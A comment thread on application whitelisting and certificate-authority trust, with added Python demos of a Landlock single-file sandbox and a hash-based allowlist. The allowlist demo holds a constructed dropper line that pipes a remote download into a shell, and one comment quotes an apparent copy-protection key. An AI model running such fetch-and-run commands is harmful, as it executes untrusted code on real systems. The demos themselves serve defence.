Even while extolling the virtues of SSL certificate authorities here, I am also newly aware of a potential problem... a betrayal of sorts. VeriSign has 60% of the CA market and doubtless hold most of the keys. They have also entered a new market that 'synergizes' with their existing one: VeriSign is now a "lawful intercept" subcontractor. Under the expanded scope of CALEA, they spy on both voice and data communications for the FBI and NSA. In the case of purely USA-domestic links, they presumably act only on a court warrant, but where any hint of the international is involved (very easy to construe on the Internet) there isn't even a need for a warrant.
VeriSign are capitalizing on what seems to be their unique ability to stage MITM attacks undetected.
I don't mind recommending certs in response to a topic about the explosion of garden-variety Internet crime. But there is that ultimate question of privacy to contend with; of countering widespread government surveillance.
Community-organized CAs could perhaps gain trust through PGP signing, for what are otherwise normal SSL CA services. Major Linux distros could start CAs based on their considerable PGP signing histories, since they already use public key identification for their repositories.
Perhaps the OS that was developed over the Internet could end up saving it.
Just a thought...
HP Labs hacked some sandboxing into Windows (PDF, sorry) including a few capability-based ideas, e.g. the only way for an application to write outside its temp directory is if the user grants a capability implicitly via the open file dialog.
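The restriction described in the Word post above (read/write on nothing but the one file chosen in a trusted open dialog) and the capability-via-open-dialog idea in the HP Labs post can be tried on Linux with Landlock, the kernel's unprivileged filesystem sandbox (5.13 and later). What follows is an added example, not code from either post or from Plash, EROS or HP Labs. It calls the three Landlock syscalls through ctypes, whitelists read and write on a single file standing in for the user's chosen document, and then checks in a forked child that any other file is refused. Syscall numbers and access bits are copied from the kernel uABI; the temporary directory and the file names `document.txt` and `secret.txt` are made up for the demo. If the running kernel has no Landlock, the demo reports that it was skipped rather than failing.

```python
"""Landlock demo: whitelist the filesystem actions one process may take.

Added example (not from the thread). Linux-only; needs a 5.13+ kernel with
Landlock enabled, otherwise landlock_demo() returns 0 ("skipped").
"""
import ctypes
import os
import struct
import sys
import tempfile

# Landlock syscall numbers are the same on every architecture (uABI, 5.13+).
NR_LANDLOCK_CREATE_RULESET = 444
NR_LANDLOCK_ADD_RULE = 445
NR_LANDLOCK_RESTRICT_SELF = 446
LANDLOCK_CREATE_RULESET_VERSION = 1      # flag: only ask for the ABI version
LANDLOCK_RULE_PATH_BENEATH = 1           # rule type: rule bound to a path
LANDLOCK_ACCESS_FS_WRITE_FILE = 1 << 1   # access bits from linux/landlock.h
LANDLOCK_ACCESS_FS_READ_FILE = 1 << 2
PR_SET_NO_NEW_PRIVS = 38                 # must be set before restrict_self

_libc = ctypes.CDLL(None, use_errno=True)


def _syscall(nr, *args):
    """Raw syscall through libc; returns the result (negative on error)."""
    return _libc.syscall(ctypes.c_long(nr), *args)


def landlock_abi_version():
    """Landlock ABI version of the running kernel, or -1 if unavailable."""
    if sys.platform != "linux":
        return -1
    return _syscall(NR_LANDLOCK_CREATE_RULESET, None, ctypes.c_size_t(0),
                    ctypes.c_uint(LANDLOCK_CREATE_RULESET_VERSION))


def restrict_to_single_file(path):
    """Allow this process READ/WRITE on `path` only; all other files are denied.

    This is the 'only the file chosen in the open dialog' policy. Returns True
    on success, False if the kernel refused (Landlock missing or blocked).
    """
    # struct landlock_ruleset_attr { __u64 handled_access_fs; }: the accesses
    # this ruleset governs. Handled but not granted by a rule means denied.
    handled = LANDLOCK_ACCESS_FS_READ_FILE | LANDLOCK_ACCESS_FS_WRITE_FILE
    ruleset_fd = _syscall(NR_LANDLOCK_CREATE_RULESET, struct.pack("=Q", handled),
                          ctypes.c_size_t(8), ctypes.c_uint(0))
    if ruleset_fd < 0:
        return False
    try:
        # struct landlock_path_beneath_attr { __u64 allowed_access; __s32 parent_fd; }
        # (packed, 12 bytes). The O_PATH fd is the capability: the rule is tied
        # to this file's identity, not to its name.
        target_fd = os.open(path, os.O_PATH | os.O_CLOEXEC)
        try:
            rule = struct.pack("=Qi", handled, target_fd)
            res = _syscall(NR_LANDLOCK_ADD_RULE, ruleset_fd,
                           ctypes.c_uint(LANDLOCK_RULE_PATH_BENEATH), rule, ctypes.c_uint(0))
        finally:
            os.close(target_fd)
        if res < 0:
            return False
        if _libc.prctl(PR_SET_NO_NEW_PRIVS, ctypes.c_ulong(1), ctypes.c_ulong(0),
                       ctypes.c_ulong(0), ctypes.c_ulong(0)) != 0:
            return False
        return _syscall(NR_LANDLOCK_RESTRICT_SELF, ruleset_fd, ctypes.c_uint(0)) == 0
    finally:
        os.close(ruleset_fd)


def landlock_demo():
    """Apply the policy in a child process and report the outcome.

    Returns 1 if the whitelist held (chosen file opens, the other is refused),
    0 if Landlock could not be applied on this kernel (skipped), -1 on a breach.
    """
    if landlock_abi_version() < 0:
        return 0
    workdir = tempfile.mkdtemp(prefix="landlock-demo-")
    chosen = os.path.join(workdir, "document.txt")   # constructed: the file the user picked
    other = os.path.join(workdir, "secret.txt")      # constructed: anything else on disk
    for p in (chosen, other):
        with open(p, "w") as f:
            f.write("constructed sample content\n")
    try:
        pid = os.fork()
        if pid == 0:                                  # child: plays the sandboxed application
            if not restrict_to_single_file(chosen):
                os._exit(2)
            ok = True
            try:
                os.close(os.open(chosen, os.O_RDWR))  # whitelisted: must succeed
            except OSError:
                ok = False
            try:
                os.open(other, os.O_RDONLY)           # not whitelisted: must be EACCES
                ok = False
            except PermissionError:
                pass
            except OSError:
                ok = False
            os._exit(1 if ok else 3)
        _, status = os.waitpid(pid, 0)
        return {1: 1, 2: 0}.get(os.WEXITSTATUS(status), -1)
    finally:
        for p in (chosen, other):
            os.unlink(p)
        os.rmdir(workdir)


if __name__ == "__main__":
    print({1: "whitelist enforced", 0: "skipped: no Landlock", -1: "POLICY BREACH"}[landlock_demo()])
```

The policy is applied in a forked child so the calling process is not restricted; in a real design the parent is the trusted dialog (or broker) and the child is the application, and the parent hands over only the file the user chose. Landlock restrictions are inherited across fork and exec and cannot be lifted, which is what makes them a usable per-application whitelist.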
Ah, but what if you can set up a system where us /.ers allowing or blocking an application updates the whitelist? You can set up some kind of web of trust for the clueless among the internet population to rely on.
09F91102 no, 455FE104 nope, F190A1E8 uh-uh, 7A5F8A09 that's not it, C87294CE no. Ah! 452F6E403CDF10714E41DFAA257D313F.
Have you ever seen an 11-year old deal with security warnings? It goes like this: Yes / OK / Geez this is stupid / Sure / Why not / I just want to play "frogger!"
I find it deeply disturbing that after reading the 59 comments available at threshold 2, I haven't seen any that demonstrate the slightest familiarity with how a HIPS program works.
Your IT administrator sets the whitelist by using learn mode, not Symantec.
"Nothing was broken, and it's been fixed." -- Jon Carroll
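What a HIPS-style "learn mode" allowlist actually does, as an added example rather than anything from the post above or from any Symantec product: a learn pass records the SHA-256 of every executable under a directory, and the enforce pass admits only a file whose current content hash is recorded. The tail of the demo shows both sides of the argument in this thread: a binary dropped in later is refused whatever it is renamed to (identity is the hash, not the path), but rebuilding a legitimate tool changes its hash and knocks it off the list until the administrator re-learns, and re-learning on a host that already carries the dropper admits the dropper too. The directory, script names and contents are constructed for the demo.

```python
"""Content-hash application allowlist with a learn mode and an enforce mode.

Added example, not from the thread or from any vendor product. A file's
identity is the SHA-256 of its bytes, never its name or path.
"""
import hashlib
import json
import os
import shutil
import stat
import tempfile


def file_sha256(path):
    """SHA-256 hex digest of a file, streamed so large binaries are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def learn(root):
    """Learn mode: record every regular executable file under `root` as allowed.

    Returns {sha256: first path seen}. Only executables are collected because
    the list governs what may run, not what may be opened.
    """
    allowed = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                      # lstat: do not follow symlinks out of the tree
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IXUSR:
                allowed.setdefault(file_sha256(path), path)
    return allowed


def save_allowlist(allowed, path):
    with open(path, "w") as f:
        json.dump(allowed, f, indent=2, sort_keys=True)


def load_allowlist(path):
    with open(path) as f:
        return json.load(f)


def is_allowed(exe_path, allowed):
    """Enforce mode: admit only if the file's current content hash is on the list."""
    return file_sha256(exe_path) in allowed


def demo():
    """Learn, enforce, then replay the developer's and the attacker's moves."""
    root = tempfile.mkdtemp(prefix="allowlist-demo-")
    bindir = os.path.join(root, "bin")
    os.mkdir(bindir)

    def write_exe(name, body):                       # constructed sample "programs"
        p = os.path.join(bindir, name)
        with open(p, "w") as f:
            f.write(body)
        os.chmod(p, 0o755)
        return p

    try:
        tool = write_exe("report.sh", "#!/bin/sh\necho monthly report\n")
        write_exe("backup.sh", "#!/bin/sh\ntar cf /dev/null .\n")
        with open(os.path.join(bindir, "README"), "w") as f:
            f.write("not executable, so not part of the list\n")

        listfile = os.path.join(root, "allowlist.json")
        save_allowlist(learn(bindir), listfile)      # admin runs learn mode on a clean host
        allowed = load_allowlist(listfile)
        results = {"learned": len(allowed), "tool_allowed": is_allowed(tool, allowed)}

        # A file that arrived after learn mode is refused, whatever it is called.
        dropper = write_exe("update.sh", "#!/bin/sh\ncurl http://example.invalid/x | sh\n")
        results["dropper_allowed"] = is_allowed(dropper, allowed)
        renamed = os.path.join(bindir, "report2.sh")
        os.rename(dropper, renamed)
        results["renamed_dropper_allowed"] = is_allowed(renamed, allowed)

        # The developer's complaint: rebuild the tool and its hash changes.
        write_exe("report.sh", "#!/bin/sh\necho monthly report v2\n")
        results["rebuilt_tool_allowed"] = is_allowed(tool, allowed)

        # Re-learning restores the tool but also admits whatever else is present.
        relearned = learn(bindir)
        results["tool_after_relearn"] = is_allowed(tool, relearned)
        results["dropper_after_relearn"] = is_allowed(renamed, relearned)
        return results
    finally:
        shutil.rmtree(root)
```

The last two results are the practical caveat: learn mode is only as good as the host it runs on, so the learn pass belongs on a freshly built machine, and later changes should be admitted by updating the list with the specific new hash rather than by re-learning the whole directory.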
Didn't slashdot just recently do this exact same story? This fits in with DRM, here choose from this list of approved things to do with your computer and nothing else.
Their competition have been working on this idea for a while with Symbian Signed and Nokia Mosh
Why can't we call it an authorized or approved list? If it is bad, call it an unapproved list.
Darn, another e-mail from Nigeria about another dead relative.... Let me add him to the black list.